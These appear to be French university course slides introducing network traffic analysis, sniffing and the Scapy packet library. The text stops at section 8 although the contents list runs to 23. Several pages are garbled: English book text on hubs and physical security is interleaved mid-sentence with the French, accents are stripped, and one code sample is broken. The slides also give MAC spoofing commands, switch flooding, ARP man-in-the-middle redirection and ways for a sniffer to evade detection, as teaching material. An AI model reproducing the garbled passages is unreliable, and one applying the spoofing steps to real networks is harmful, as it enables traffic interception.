Cours Scapy

Master 1 UE Rseaux Avancs II
Les Fourberies de Scapy
P-F. Bonnefoi
Version du 16 janvier 2013
Les fourberies de Scapy
Table des matires

1
1.1
1.2
1.3
1.4
1.5
2
3
3.1
3.2
3.3
4
4.1
5
5.1
6
7
7.1
7.2
Introduction lanalyse de trafic rseau . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Les lments de lanalyse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
De limportance des schmas ou pattern . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
La notion de signatures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Utilisation des signatures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Les rsultats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Quest-ce que Scapy ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Python & Scapy : cration de module ou de programme . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Python & Scapy : utilisation du mode interactif . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Python & Scapy : suivre lexcution dun programme . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Python & Scapy : intgration de Scapy dans Python . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Python : programmation objet & classe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Python : programmation objet & mthodes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Python : aide sur les lments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Python : aide & Introspection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Python : utilisation avance des squences . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Scapy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Scapy : aide sur les lments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Scapy : aide & Introspection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
5
6
7
8
9
10
16
17
18
19
20
21
22
23
24
25
26
27
28
7.3
Scapy : affichage de protocole . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
8 Scapy : structure des objets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
8.1
Scapy : structure des objets & empilement de couches . . . . . . . . . . . . . . . . . . . . . . . . . . .
9 Scapy et fichier pcap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
9.1
Les listes de paquets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
10 Scapy et lcoute rseau . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
11 Dcomposition et composition de paquets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
12 Lenvoi de paquets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
13 Quelques injections : ARP & DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
13.1 Quelques injections : DNS Suite . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
14 Affichage descriptif dun paquet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
15 Cration automatique de collection de paquets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
15.1 Cration de fichier pcap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
16 change de paquet de Wireshark vers Scapy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
17 Ajout de protocole . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
17.1 Description rapide de STUN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
17.2 Exemple dajout de protocole : protocole STUN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
17.3 Format dun paquet STUN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
17.4 Ajout de protocole : les champs de longueur variable . . . . . . . . . . . . . . . . . . . . . . . . . . . .
17.5 Ajout de protocole : liens entre couches protocolaires . . . . . . . . . . . . . . . . . . . . . . . . . . . .
29
30
31
33
34
35
36
39
40
41
42
43
44
45
47
48
49
51
52
54
56
17.7 Ajout de protocole : retour sur les layers. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

17.8 Ajout de protocole : comment aller plus loin ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
17.10 Ajout de protocole : intgration dans Scapy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
17.11 Test de lajout du protocole STUN dans Scapy. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
17.12 Ajout de lextension MPLS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
18 Scapy & IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
19 Scapy & NetFilter . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
20 Utilisation de dnsmasq . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
21 Le proxy ARP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
22 Utilisation debtables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
23 LXC et interfaces rseaux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
57
58
59
61
62
63
65
66
73
75
76
77
1 Introduction lanalyse de trafic rseau
Lorsque lon analyse la trace de paquets changs dans un rseau, il est important de savoir
distinguer entre :
un stimulus , c--d un vnement, qui lorsquil arrive sur le rcepteur, dclenche une rponse ;
une rponse , c--d un vnement li la rception dun stimulus (modle comportemental).
Attention :
? le rcepteur est actif et attentif, et identifier le stimulus ne suffit pas toujours prdire la rponse ;
? les stimulus/rponses sont inter corrls, mais peuvent dpendre dautres lments indpendants : tat du rcepteur, seuil ou filtrage des stimulus ou des rponses, ncessit de plusieurs
stimulus diffrents reus dans un certain ordre, etc.
Lanalyse peut tre faite :
. en connaissant ltat exacte du rcepteur (en tant sur le rcepteur par exemple) ;
. sans connaitre ltat du rcepteur.
Dans certains cas, on essaye de construire un modle empirique de cet tat.
1.1 Les lments de lanalyse
Les lments sur lesquels on travaille sont :

. les paquets qui circulent dans le rseau, c--d dans le cas de TCP/IP, lensemble des champs
dentte du datagramme IP (drapeaux, adresses de destination, de source, fragmentation,
etc.) et des protocoles suprieurs (TCP, UDP, DNS, etc.) ;
. pour chacun de ces paquets, les champs qui les constituent :

leur valeur, le sens attach ces valeurs, donne des informations sur lmetteur et sur son
intention lors de lenvoi de ce paquet ;
ils donnent galement des informations sur le contexte de lchange, c--d pas seulement
sur lexpditeur et le destinataire, mais galement sur le travail des intermdiaires ou sur
les conditions rseaux (par exemple la fragmentation dun datagramme IP donne des informations sur la MTU, la dcrmentation dun TTL sur lexistence dun intermdiaire, la taille
des fentres TCP sur la congestion, etc.) ;
. des schmas, ou pattern, dchange rseau. Ces schmas fournissent, lorsquils sont reconnus, une information de plus haut niveau (par exemple, un change de 3 paquets peuvent
dcrire un handshake TCP et signifier un tablissement de connexion).
1.2 De limportance des schmas ou pattern
Ces schmas dchange peuvent galement tre appels des signatures .

Un attaquant :
crit un logiciel pour raliser une attaque, par exemple, par dni de service , ou un exploit ;
utilise ce logiciel sur un rseau ou une machine cible ;
laisse une signature (une trace dchanges de paquets), qui est le rsultat de la construction,
crafting , de paquets pour raliser cette attaque ou cet exploit.
Trouver cette signature, cest :

a. dtecter quune attaque a eu lieu (dtection post-mortem, ou forensic ), ou se droule actuellement ( Intrusion Detection System , avec ventuellement la possibilit dempcher quelle
russise : Intrusion Prevention System ) ;
b. dcouvrir lidentit de lattaquant (par exemple, pouvoir bloquer lattaque pour viter quelle se
poursuive comme dans le cas dun dni de service).
On peut faire un parallle avec la balle de rvolver, qui permet une fois analyse, didentifier le
ft du rvolver qui la tir.
1.3 La notion de signatures
La dtection de ces signatures, pattern matching , reposent sur :
? leur connaissance : connatre le schma dchange qui ralise lattaque ;

? leur dtection : pouvoir trouver parmi le trafic rseau que lon surveille, les paquets relatifs ce
schma (chacun de ces paquets peut subir des variations dpendant du contexte : adresses
diffrentes, ou bien dpendant de la vulnrabilit exploite : un contenu utilis uniquement
pour sa taille) ;
? leur enchanement :
un schma peut tre ralis suivant des temps plus ou moins long et peut, ainsi, sentrelacer
avec un trafic normal ;

un schma peut tre suffisamment ouvert pour rendre difficile la corrlation des paquets
qui le forme (des paquets provenant de source trs diffrentes par exemple).
? la capture du trafic : pouvoir capturer les paquets qui forment le schma. Il faut mettre en
place des capteurs ou sondes au bon endroit dans le rseau (sur un routeur avant le NAT
par exemple), pour pouvoir capturer convenablement ces paquets.
1.4 Utilisation des signatures
Ces signatures peuvent tre dtermines sur lensemble des protocoles :
sur la technologie rseau : par exemple qui concerne la couche n 2 comme Ethernet avec
les trames ARP, les VLANS, etc. ;
sur la pile TCP/IP : ce sont des signatures qui concernent les couches 3&4, c--d IP et transport
avec ICMP, TCP, UDP, etc. ;
sur les protocoles applicatifs : en exploitant des protocoles comme HTTP (attaques ciblant
le CGI par exemple), NetBios, etc.

Pour tre efficace, la dtection de certaines signatures passe par la connaissance et la cration
dun tat du rcepteur.
On parle alors de mode stateful : lattaquant va amener, par exemple, la pile de protocole de
la victime dans un certain tat avant de continuer son attaque (la progression de lattaque nest
possible que suivant ltat courant de la victime).
Des outils comme Snort , utilise ce systme de signature.
1.5 Les rsultats
10
Le rsultat de lanalyse peut conduire :
? la journalisation, log , de lattaque, avec ou non sauvegarde des paquets suspicieux ;

? lenvoi dune alerte ladministrateur : attention la notion de faux positifs , c--d lidentification errone dune attaque qui peut conduire saturer ladministrateur, qui ensuite ne fait
plus attention ces alertes mme si elles deviennent de vraies alertes ;
? la mise en place de contre-mesure : filtrage du trafic incrimin par reconfiguration du firewall,

envoi de paquets pour mettre fin une connexion TCP, etc. ;
? etc.
Retour sur les types de connexion
11
Utilisation de Switch
Le switch permet de faire de la commutation :
? il est diffrent du hub :
inilthemet
en relation un port directement avec un autre pour une trame destination unicast ;
packet header and accept the data.The area that the hub forwards all information to is known as a collision domain (also known as broadcast domain). A hub has only
one
il diffuse
sur tous les ports pour une trame destination multicast ;
collision domain for all traffic to share. Figure 1.4 shows a network architecture
with collision domains related to hubs. Large collisions make sniffing easier and
costly switches include better technology that makes them more
create
il limite
collision
,hub.c--d l o ofresistant
il the
y more
atocomptition
pour accder au support
performanceles
issues
suchdomaines
as bandwidth hoggingde
or excessive
traffic on the
sniffing attacks.
de transmission,
: Collision Domains
Figure
1.4 Hub Collision Domains pour le mme domaine de diffusion
Figure 1.5 Switch
377_Eth_2e_ch01.qxd
11/14/06
9:27 AM
Page 26
377_Eth_2e_ch01.qxd
26
11/14/06
9:27 AM
Page 27
Chapter 1 Introducing Network Analysis
Introducing Network Analysis Chapter 1
External
Network
External
Network
Router
Hub
Collision Domain
Router
Switch
Hub
Collision Domain
A switch is also used to connect computers together on a shared medium;

however, when a switch receives information, it doesnt blindly send it to all other
computers; it looks at the packet header to locate the destination MAC address,
and maintains a list of all MAC addresses and corresponding ports on the switch
that the computers are connected to. It then forwards the packets to the specified
port. This narrows the collision domain to a single port (see Figure 1.5). This type
of collision domain also provides a definite amount of bandwidth for each connection rather than a shared amount on a hub. Because the price of switches has
fallen dramatically in the last few years, there is no reason not to replace hubs
with switches, or to choose switches when purchasing new equipment. Also, some
Attention
Collision Domains
As you can see from the diagrams, hubs make sniffing easier and switches make
sniffing more difficult. However, switches can be tricked, as discussed in the
Defeating Switches section.
Portavec
Mirroring
Pour diviser le domaine de diffusion : il faut des switch
VLAN.
www.syngress.com
If you are working on a network that uses switches and you want to perform network analysis legitimately, you are in luck; most switches and routers come with port
mirroring (also known as port spanning).To mirror ports, you have to configure the
switch to duplicate the traffic from the port you want to monitor to the port you
are connected to.
Using port spanning does not interfere with the normal operation of switches,
but you should always check the documentation of the exact switch you are config-
27
377_Eth_2e_ch01.qxd
28
Mettre sur coute le rseau ?

Les diffrentes solutions
. le port mirroring :
11/14/06
9:27 AM
Page 28
Chapter 1 Introducing Network Analysis
will increase the amount of traffic on a specific destination port, therefore, make sure
your properly configured network analyzer is the destination port. Also, consult the
documentation for your specific switch to learn the exact command to enable port
mirroring (see Figure 1.6).The switch is configured to mirror all port 1 traffic to
port 5, and the network analyzer sees all traffic to and from Computer A. Sometimes
administrators mirror the uplink port on a switch, so that they can see all of the
traffic to and from the switch and all of its ports.
12
Figure 1.6 Port Mirroring
On configure explicitement le switch pour dupliquer le trafic dun port

sur un autre.
Ici, le trafic du port 1 est relayer sur le port 5.
Il faut tre administrateur du switch.
Avec CISCO, on parle de SPAN : Switch Port Analyzer : spanning a
port = mirroring a port.
External
Network
Router
Port 1
Port 5
Switch
Computer A
Network
Analyzer
. Switch Flooding :
N
Span stands for Switched Port Analyzer. Cisco uses the word span to
un switch contient une table dallocation (port,@MAC) ;
describe the concept of port mirroring. In Cisco terms, spanning a port is
the same as mirroring a port.
si cette table devient pleine, le switch se comporte comme un hub et relais
les trames vers tous les ports ;
OTE
Il faut envoyer un grand nombre de trames avec des @MAC diffrentes pour remplir la table pour la flooder .
www.syngress.com
. Redirection ICMP : ICMP permet dindiquer le routeur que doit utiliser une machine spcifique pour aller sur
le rseau.
. ICMP Router Advertisements : ICMP permet dindiquer toutes les machines connectes au rseau la prsence
dun routeur ;
. Cable Taps : se connecter physiquement au rseau : le plus intressant tant dintercepter le trafic sur le uplink
du switch (c--d le trafic en remonte ou sortant).
Mettre sur coute le rseau ?
13
. Redirection ARPs :
les requtes ARPs de correspondance @IP @MAC sont diffuses en broadcast, vers tous les ports ;
seul le matriel concern rpond (il existe aussi des gratuitous ARP qui sont envoyes spontanment pour
informer).
> p
<Ether
dst=ff:ff:ff:ff:ff:ff src=02:02:02:02:02:02 type=0x806 |<ARP
hwtype=0x1 ptype=0x800 hwlen=6 plen=4 op=who-has
hwsrc=02:02:02:02:02:02 psrc=192.168.1.1 hwdst=ff:ff:ff:ff:ff:ff pdst=192.168.1.1

|<Padding
load=\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 |>
> p.summary()
Ether / ARP who has 192.168.1.1 says 192.168.1.1 / Padding
Il est possible de forcer le switch a renvoyer le trafic o il ne devrait pas :

prendre la place dune machine : Spoofing ;
prendre la place du routeur pour une machine particulire : MITM, Man in the Middle .
. MAC Address Spoofing : changer l@MAC de son interface rseau et prendre celle de la victime pour reconfigurer
le switch (on peut empcher la victime de reconfigurer le switch avec un DoS, Deny Of Service ).
# ifconfig eth0 down
# ifconfig eth0 hw ether 00:02:de:ad:be:ef
# ifconfig eth0 up
# ping -c 1 -b 172.16.0.255
Certains switch protgent lassociation entre une @MAC et un port la premire adresse reue.
. Port Spanning Reconfiguration on Switch : configurer le port mirroring .

Cela peut tre fait en se connectant la console dadministration du switch ou en utilisant SNMP, Simple Network
Management Protocol sil na pas t protg.
Comment dtecter les sniffer ?
14
Un sniffer est une machine interceptant le trafic qui ne lui est pas destin
? Surveiller les DNS Reverse Lookups , c--d les requtes DNS de rsolution inverse @IP FQDN, Full
Qualified Domain Name ou @symbolique.
Les outils de sniffing font ce type de requtes pour afficher des rapports plus dtaill. Il est possible de le dclencher en effectuant soi-mme un scan du rseau.
? Envoyer des paquets TCP/IP avec des fausses @MAC destination vers lensemble des machines.
Une machine en mode promiscuous ralisant du sniffing peut traiter un paquet qui ne lui est pas destin et
renvoyer un RST. Ne pas oublier dinterdire tout paquet en sortie dune interface de sniffing !
? Surveiller les ports des hubs : savoir si un port non utilis devient utilis. Il est possible dutiliser SNMP pour
surveiller cette activit.
? Utiliser le fonctionnement dARP : envoyer une requte ARP, non pas en broadcast, mais vers une adresse unique
bidon, puis envoyer un ping en broadcast : il se peut que la machine ayant un sniffer rponde car elle a
intercept la requte initiale (elle intercepte tout, y compris ce qui ne la concerne pas).
? une variante de la prcdente est dutiliser une requte ARP vers ladresse spciale ff:ff:00:00:00:00.
? Utiliser un honeypot , c--d une machine leurre contenant de fausses donnes et de faux services pour attirer
un attaquant et le forcer se rvler.
? Surveiller les ressources dune machine susceptible dabriter un sniffer : temps CPU et occupation disque (des
paquets conserver et analyser).
Layer 1: The Physical Layer Chapter 2
65
Comment
viter
dtre dcouvert
Figure 2.16 One-Way
Data Cable
15
? Construire un cble uniquement en coute , le One-way cable :

la prise qui se connecte au switch sera modifie :
? le fil 1 est connect au fil 3 ;
? le fil 2 est connect au fil 6 ;
mission et rception sont mis en
boucle.
? bloquer le protocole ARP sur son interface de sniffing :
Summary
$ sudo ip
Physical layer security is the cornerstone of all security controls. While security controls at
Linterface
nenverra
requte
neresults
rpondra avec des
other layers
may fail without
catastrophicpas
results,de
the loss
of physicalARP,
security ni
usually
in total exposure. Security controls cost money and many times their value is under-rated. A
Il faudra
utiliser
tables
(ARP,@IP)
large portion
of security
controls des
limit the
access ofdassociations
insiders with the side effect
being that it statiques.
limits many companies motivation to implement strong controls. We like to think that these
trusted employees are on our team, but numbers show that many more attacks originate
filtrer les messages ARP destination de ladresse
from inside of an organization than from the outside. Physical controls are not always expensive. Items like locks are relatively cheap yet deter and delay attackers. Session controls, password protected screen savers, and auto logoffs are also cheap to deploy. Good physical
security also requires the control of paper documents. Shredders are an easy way to prevent
dumpster diving.
Attacks on physical security are nothing new.They existed long before computer networks or modern organizations were envisioned.There are many tools at an attackers disposal. Lock pick sets, wiretapping equipment, and scanners are easy for an attacker to
acquire. Attackers with basic computer skills can use wireless hacking tools or acquire security equipment for disassembly and analysis. In the end, security professionals must realize
that they are not fighting a single battle, but are part of an ongoing war that will continue
for the unforeseeable future.
link set dev eth1 arp off
rponses ARP.
ff:ff:00:00:00:00.
2 Quest-ce que Scapy ?
16
une bibliothque Python : cela permet de profiter de tout lenvironnement offert par Python ;
un outil interactif la manire de linterprte Python ;
un wrapper autour de la bibliothque de capture/analyse de paquet de niveau
utilisateur libpcap ;
des fonctions qui permettent de lire et dcrire des fichiers pcap gnrs par WireShark
qui contiennent des captures de trafic rseau :cela permet de programmer un traitement
raliser sur un ensemble de paquets ;
des fonctions danalyse et de construction, des paquets rseaux partir de la couche 2

(capacit de forger un paquet) : cela permet de manipuler de manire simple des paquets
de structures complexes associs des protocoles courant ;
des fonctions denvoi de ces paquets et de rception des paquets rponses associs : cela
autorise la conception simplifie doutils efficaces ;
des fonctions dcoute, sniffing , du trafic rseau ;

des fonctions de cration de reprsentation :
sous forme de courbes dun ensemble de valeurs calcules ;
sous forme de graphe dchanges entre matriels ;
sous forme de graphes de la topologie dun rseau.
3 Python & Scapy : cration de module ou de programme
17
La notion de module en Python est similaire celle de bibliothque dans les autres
langages de programmation ; la diffrence est que les instructions se trouvant dans un module
Python sont excutes lors de son importation.
Ce qui est normal car certaines de ces instructions servent dfinir les fonctions et constantes
du module.
Certaines instructions ne devraient tre excutes, ou nont de sens, que si le module est
excut directement en tant que programme depuis le shell, c--d en tant que programme.
Pour pouvoir faire la diffrence entre une excution en tant que module ou en tant que programme principale, il faut tester la variable __name__ :
1
if __name__ == "__main__":
print "Execution en tant que programme"
La possibilit dexcuter un module en tant que programme permet, par exemple, de faire des
tests du bon fonctionnement du module pour viter des rgressions (modifications entrainant des erreurs) et constituent la base des tests unitaires , mauvaise traduction accepte
de test de modules, unit testing.
Ces tests permettent de juger de la bonne adquation du module par rapport aux attentes, et
sont utiliss dans lExtreme programming, XP, ou la programmation agile.
3.1 Python & Scapy : utilisation du mode interactif
18
Python est un langage interprt qui met la disposition de lutilisateur un mode interactif,
appel galement interprte de commande , o lutilisateur peut entrer directement ses instructions afin que Python les excutent.
Dans ce mode il est possible de dfinir des variables, ainsi que des fonctions et tout lment
de Python.
Lintrt rside dans la possibilit de pouvoir tester/excuter rapidement des instructions sans
avoir crire de programme au pralable.
Ce mode est utilis dans Scapy, en utilisant la commande shell scapy, qui permet de lancer
un interprte de commande tout en bnficiant de tous les lments disponibles dans Scapy.
Il est possible de dfinir soi-mme dans un programme un basculement en mode interactif :
1
if __name__ == "__main__":
interact(mydict=globals(), mybanner="Mon mode interactif a moi")
Ici, lutilisation du mode interactif dans un source est combin avec la dtection dune utilisation
en tant que module ou en tant que programme.
On passe en argument mydict=globals() pour bnficier de tout ce que lon a dfini dans
le module sans avoir limporter lui-mme.
3.2 Python & Scapy : suivre lexcution dun programme
19
On peut lancer le programme dont on veut suivre lexcution pas pas :

python -m trace -t mon_programme.py
On peut galement obtenir la liste des liens dappels des fonctions les unes avec les autres :
python -m trace -T mon_programme.py
Si votre programme utilise le mode interactif, les informations ne seront disponibles que lors
de larrt du programme.
Le paramtre -m indique Python dexploiter le module indiqu ensuite, ici, trace .
Pour avoir plus doptions, vous pouvez consulter la documentation du module trace de
Python.
3.3 Python & Scapy : intgration de Scapy dans Python
20
Pour installer Python et disposer des dernires rvisions avec mercurial :
$ hg clone http://hg.secdev.org/scapy
$ cd scapy
$ sudo python setup.py install
Pour mettre jour, il suffira de faire la procdure suivante :
$ hg pull
$ hg update
$ sudo python setup.py install
Pour pouvoir utiliser les fonctions Scapy dans un programme Python il faut importer la bibliothque Scapy :
1
#!/usr/bin/python
# coding= latin1
from scapy.all import *
# le source utilisateur
laide de cette syntaxe spciale, les commandes de Scapy seront utilisables directement
dans votre programme, sans avoir les prfixer avec le nom du module (Attention aux conflits
de noms avec vos propres fonctions et variables).
4 Python : programmation objet & classe

1
"""Classe definissant une personne""" # Description de la classe
nombre_de_personnes = 0
# self fait rfrence linstance
def __init__(self, name, age): # permet linitialisation de linstance
# variable de classe
self.name = name
self.age = age
self.__numeroSecu = 0 # variable privee
Personne.nombre_de_personnes += 1
# permet de rendre ces variables uniques chaque instance
def intro(self): # Il faut donner en parametre linstance
11
"""Retourne une salutation."""
12
return "Bonjour, mon nom est %s et jai %s ans." % (self.name, self.age)
13
class Personne(object): # classe dont on hrite
10
21
p1 = Personne("toto", 10) # on ne met pas le self en argument
Remarques :
les variables dinstances prcdes dun prfixe __ sont prives et ne peuvent tre
accessible depuis lextrieur de lobjet ;
Mais, la notation p1._Personne__numeroSecu permet dobtenir la valeur de
lattribut. . .
Donc, on peut utiliser un seul _ et faire confiance aux programmeurs !
4.1 Python : programmation objet & mthodes
22
Il est aussi possible de faciliter laccs des variables dinstance, tout en gardant une capacit de contrle sur ces modifications avec le property :
1
class Personne2(object):
def __init__(self):
3
4
def _getNom(self):
return self._nom
def _setNom(self, val):
7
8
9
self._nom = indefini
self._nom = val
nom = property(fget = _getNom, fset = _setNom, doc = Nom)
p1 = Personne2()
10
print p1.nom # affiche indefini
11
p1.nom = "Toto" # defini le nom de p1
12
print p1.nom # affiche Toto
Complments :
Python intgre un garbage collector ou ramasse miettes,
il est possible de faire de lhritage multiple.
Pour accder une mthode danctre : ancetre.__init__().
5 Python : aide sur les lments
23
Les objets de Python sont capable dintrospection, c--d davoir la capacit de sexaminer euxmme.
On peut obtenir de laide sur un objet ou un module :
pef@pef-desktop:~/Bureau/project$ python
Python 2.6.4 (r264:75706, Dec
7 2009, 18:45:15)
[GCC 4.4.1] on linux2

Type "help", "copyright", "credits" or "license" for more information.
> help
Type help() for interactive help, or help(object) for help about object.
>
On peut attacher de la documentation au code Python lors de son criture :

1
def ma_fonction():
"""Cette fonction est vide !"""
pass
> help(ma_fonction)
Help on function ma_fonction in module __main__:

ma_fonction()
Cette fonction est vide !
Sur un objet, la fonction help, affiche lintgralit de laide disponible sur ses attributs (mthodes ou variables).
5.1 Python : aide & Introspection
24
Il est possible de :
connaitre le type dun objet : type(mon_objet) ;
connaitre lidentifiant unique dun objet (quivalent son adresse mmoire) :
id(mon_objet) ;
connaitre les attributs dun objet :
dir(mon_objet) qui donne les lments de lobjet et de ceux dont il hrite ;
mon_objet.__dict__ qui donne les lments uniquement de lobjet ;
la documentation sur une classe : Personne.__doc__
ou sur une mthode : Personne.intro.__doc__
savoir si un objet possde un attribut (variable ou mthode) : hasattr(objet, "nom")
qui renvoi vrai ou faux ;
Avec les fonctions getattr et setattr on peut manipuler ces attributs sous forme de
chane de caractre (ce qui est trs utile).
savoir si un lment est excutable : callable(element) ;
savoir si un objet est une instance dune classe : isinstance(objet, classe ;
savoir si une classe hrite dune autre classe : issubclass(classe, ancetre).
6 Python : utilisation avance des squences
25
Lors de la manipulation de paquets rseaux dans Scapy, nous apprcierons les lments avancs de Python suivant :
les list comprehension qui permettent de remplacer lutilisation dune boucle for pour la
cration dune liste par rapport aux lments dune autre, chacun ayant subi un traitement :
1
ma_liste = [ 1, 2, 3, 4, 5]
ma_liste_traduite = [ hex(x) for x in ma_liste]

[0x1, 0x2, 0x3, 0x4, 0x5]
les instructions map et filter, remplaces par les list comprehension :

1
def transformer (val):
return x = x + 3
def paire (val):

return not val%2
liste_transformee = map(transformer, ma_liste)
print liste_transformee
print filter(paire, ma_liste)

[4, 5, 6, 7, 8]
[4, 6]
7 Scapy
26
Scapy est la fois un interprte de commande bas sur celui de Python et une bibliothque :
pef@pef-desktop:~/Bureau$ sudo scapy
[sudo] password for pef:
Welcome to Scapy (2.1.0-dev)
> IP()
<IP
|>
> IP().show()
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
flags=
frag= 0
ttl= 64
proto= ip
chksum= None
src= 127.0.0.1
dst= 127.0.0.1
\options\
>
Vous pouvez lutiliser en mode interactif. Vous devez lexcuter avec des droits administrateur pour tre autoris
envoyer des paquets de niveau 2 (trame Ethernet par exemple).
7.1 Scapy : aide sur les lments
27
Il est trs utile de pouvoir examiner les possibilits offertes par chaque couche protocolaire
laide de la commande ls() :
> ls(TCP)
sport
: ShortEnumField
= (20)
dport
: ShortEnumField
= (80)
seq
: IntField
= (0)
ack
: IntField
= (0)
dataofs
: BitField
= (None)
reserved
: BitField
= (0)
flags
: FlagsField
= (2)
window
: ShortField
= (8192)
chksum
: XShortField
= (None)
urgptr
: ShortField
= (0)
options
: TCPOptionsField
= ({})
Ici, on peut voir comment est constitu le paquet ou layer TCP, avec chacun de ces champs,
leur type et leur valeur par dfaut indique entre parenthse.
La commande ls() toute seule affiche tous les protocoles que sait grer Scapy. La commande
lsc() fait de mme avec lensemble des commandes.
7.2 Scapy : aide & Introspection
28
Il est facile de crer un paquet dans Scapy, il suffit dutiliser la classe qui le dfinit :
> b=IP()
> b
<IP
|>
Ici, laffichage indique le type mais pas la valeur des champs quand ceux-ci possdent celle
par dfaut.
> b.dst=164.81.1.4
> b
<IP
dst=164.81.1.4 |>
> ls(b)
version
: BitField
= 4
(4)
ihl
: BitField
= None
(None)
: ByteField
= 64
(64)
...
ttl
proto
: ByteEnumField
= 0
(0)
chksum
: XShortField
= None
(None)
src
: Emph
= 192.168.0.14
(None)
dst
: Emph
= 164.81.1.4
(127.0.0.1)
options
: PacketListField
= []
([])
Avec la commande ls(), on peut connaitre le nom de chacun des champs constituant le
paquet.
7.3 Scapy : affichage de protocole
29
Il est toujours possible daccder la reprsentation du paquet sous sa forme rseau, c--d
une suite doctets qui sont changs :
> b.show()
> hexdump(b)
###[ IP ]###
0000
4500001400010000 400014DEC0A8000E E.......@.......
version= 4
0010
A4510104
.Q..
ihl= None
tos= 0x0
> str(b)
len= None
E\x00\x00\x14\x00\x01\x00\x00@\x00\x14\xde\xc0\xa8\x00\x0e\xa4Q
id= 1
\x01\x04
flags=
frag= 0
ttl= 64
proto= ip
chksum= None
src= 192.168.0.14
dst= 164.81.1.4
\options\
>
> b.show2()
###[ IP ]###
version= 4L
ihl= 5L
tos= 0x0
len= 20
...
ttl= 64
proto= ip
...
>
Ici, la mthode show2() force le calcul de certains champs (checksum par ex.).
8 Scapy : structure des objets
30
Dans Scapy, il existe des objets Python champs , Field, et des objets Python paquets ,
Packet, qui sont constitus de ces champs.
Lorsque lon construit un paquet rseau complet, il est ncessaire dempiler les diffrentes
couches protocolaires, layers.
En particulier, un paquet (ou layer ou couche ou protocole) est constitu de :
deux attributs underlayer et payload, pour les liens entre couches infrieures et suprieures ;
plusieurs liste des champs dfinissant le protocole (TTL, IHL par exemple pour IP) :
une liste avec des valeurs par dfaut, default_fields ;
une liste avec les valeurs choisies par lutilisateur, fields ;
une liste avec les valeurs imposes lorsque la couche est imbrique par rapport
dautres, overloaded_fields.
Lempilement des couches se fait avec loprateur / :
> p=IP()/UDP()
> p
<IP
frag=0 proto=udp |<UDP
Ici, des champs de la couche IP ont t surcharges , par celle de la couche suprieure
UDP.
